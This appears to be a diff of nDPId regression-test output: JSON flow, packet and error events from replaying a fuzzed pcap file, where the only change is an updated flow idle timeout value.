-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635105,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635105,"pkt":"AODtAW69ADBUADRWCABFEAA7eRVAADkGcQaT6gH9VKgBAgAVCqDlH5dur53DNFAYYzYlcwAAMjAwIFR5cGUgc2V0IHRvIEkNCg=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120469635106,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1120469635106,"pkt":"ADBUADRWAODtAW69CABFAAAuablAAIAGOX\/AcAECk+oB\/QqgABWvncM05R+XgVAYP6htwgAAUEFTVg0K"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635105,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635105,"pkt":"AODtAW69ADBUADRWCABFEAA7eRVAADkGcQaT6gH9VKgBAgAVCqDlH5dur53DNFAYYzYlcwAAMjAwIFR5cGUgc2V0IHRvIEkNCg=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120469635106,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1120469635106,"pkt":"ADBUADRWAODtAW69CABFAAAuablAAIAGOX\/AcAECk+oB\/QqgABWvncM05R+XgVAYP6htwgAAUEFTVg0K"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":72,"global_ts_msec":1120469635127} 00428{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1120469635106,"pkt":"AODtAW69ADBUADRWCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635128,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW6zCABFAAA7aU1AAIAGOXHAqAECk3UB\/QqgABWvHcM65R+X+lAYP3SxkwAAUkVUUiBTaXRlJXMAdC54bWwNCg=="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635128,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW6zCABFAAA7aU1AAIAGOXHAqAECk3UB\/QqgABWvHcM65R+X+lAYP3SxkwAAUkVUUiBTaXRlJXMAdC54bWwNCg=="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":28,"global_ts_msec":1120469635129} 
00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW69CABFAAB6abtAAIAGOXvAqAEGk+oB\/Qqh5ncb6piKAAAAAHACQABGAAAAAgQFtAkBBAI="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469635147} 00415{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469635152,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469635152,"pkt":"AODtAW69ADBUADRWCABFAAAweRhAADkGcR4lcwD9wKgBAuZ3CqHlIbocG+qYi3ASYzaDqwAAAQEEAgIEBYM="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469635152,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469635152,"pkt":"AODtAW69ADBUADRWCABFAAAweRhAADkGcR4lcwD9wKgBAuZ3CqHlIbocG+qYi3ASYzaDqwAAAQEEAgIEBYM="} 00217{"error_event_id":13,"error_event_name":"TCP packet smaller than expected","datalink":1,"packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","size":54,"expected":62,"global_ts_msec":1120469635152} 
00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":42,"pkt_len":54,"pkt_l4_len":12,"thread_ts_msec":1120469635152,"pkt":"ADBUADRWAODtAW69CABHAAAoabxAAIAGOYLAqAECk+oB\/Qqh5ncb6piL5SG6HVAQQiTRUAAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635153,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635153,"pkt":"ADBUADRWAODtAW69CABFAAAoab1AAIAGOYHAqAECk+oB\/Qqh5ncb6piL5SG6HVARQiTRTwAA"} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635173,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1120469635173,"pkt":"AODtAW69ADBUADRWCABFAAAoeRlAADkGcSWT6gH9wOgBAuZ3CqHlIbodG+qYjFAQYzawPQAAAAAAAAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635179,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635179,"pkt":"ADBUADRWAODtAW69CABFAAAoacBAAIAGOX4lcwACk+oB\/QpPABWvncNU5R+X8VAQPzkeUQAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635153,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635153,"pkt":"ADBUADRWAODtAW69CABFAAAoab1AAIAGOYHAqAECk+oB\/Qqh5ncb6piL5SG6HVARQiTRTwAA"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635173,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1120469635173,"pkt":"AODtAW69ADBUADRWCABFAAAoeRlAADkGcSWT6gH9wOgBAuZ3CqHlIbodG+qYjFAQYzawPQAAAAAAAAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635179,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635179,"pkt":"ADBUADRWAODtAW69CABFAAAoacBAAIAGOX4lcwACk+oB\/QpPABWvncNU5R+X8VAQPzkeUQAA"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120469638585} 00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469637833,"pkt":"\/\/\/\/\/7\/\/AODtAW69CABFAABeacMAAIARTIrAqAECwKgB\/wCJAIkAOluqhPEBEAABAAAAAAB0IEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -198,10 +198,10 @@ 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by 
port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1120469634878,"flow_last_seen":1120469635196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
